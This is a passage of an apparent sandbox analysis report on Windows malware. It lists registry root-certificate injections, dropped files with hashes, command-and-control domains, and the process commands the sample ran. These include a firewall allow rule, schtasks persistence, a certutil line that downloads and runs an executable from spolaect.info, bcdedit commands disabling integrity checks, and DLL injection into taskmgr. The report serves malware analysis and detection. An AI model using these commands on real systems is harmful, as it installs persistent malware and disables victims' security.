| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a31400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a419000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a4419000000010000001000000014c3bd3549ee225aece13734ad8ca0b8030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f390f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108090850.log C:\Windows\Logs\CBS\CbsPersist_20241108090850.cab
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /133-133
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | b58f0e90-26d8-4bb2-bcd1-2c4df86a61ae.ninhaine.com | udp |
| US | 8.8.8.8:53 | server16.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server16.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server16.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server16.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server16.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | tcp | |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server16.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server16.2makestorage.com | udp |
Files
memory/1268-0-0x0000000003B10000-0x0000000003F4C000-memory.dmp
memory/1268-1-0x0000000003B10000-0x0000000003F4C000-memory.dmp
memory/1268-2-0x0000000003F50000-0x0000000004876000-memory.dmp
memory/1268-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2896-4-0x0000000003B10000-0x0000000003F4C000-memory.dmp
memory/1268-7-0x0000000003F50000-0x0000000004876000-memory.dmp
memory/1268-8-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2896-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1268-6-0x0000000003B10000-0x0000000003F4C000-memory.dmp
memory/2896-10-0x0000000000400000-0x00000000021A3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 1485d115c0db789ed882e6da39b845d0 |
| SHA1 | b25ee4515f5a1a8b420e7eba38f233ee64a24755 |
| SHA256 | 036e1c48be2a9fde1e94334dcb1216eec8512b38c118234c118aaa47b6ad65c7 |
| SHA512 | c8571df02ca3c8d69c49393d45a032a291c6f5c7100564e9a1337f287abd195c903bf86a20217990de38627d2a646dc7dde0e3953827afa94db270124c1f559b |
memory/2868-19-0x0000000003BF0000-0x000000000402C000-memory.dmp
memory/2896-21-0x0000000000400000-0x00000000021A3000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2992-41-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2992-42-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2868-53-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2868-68-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
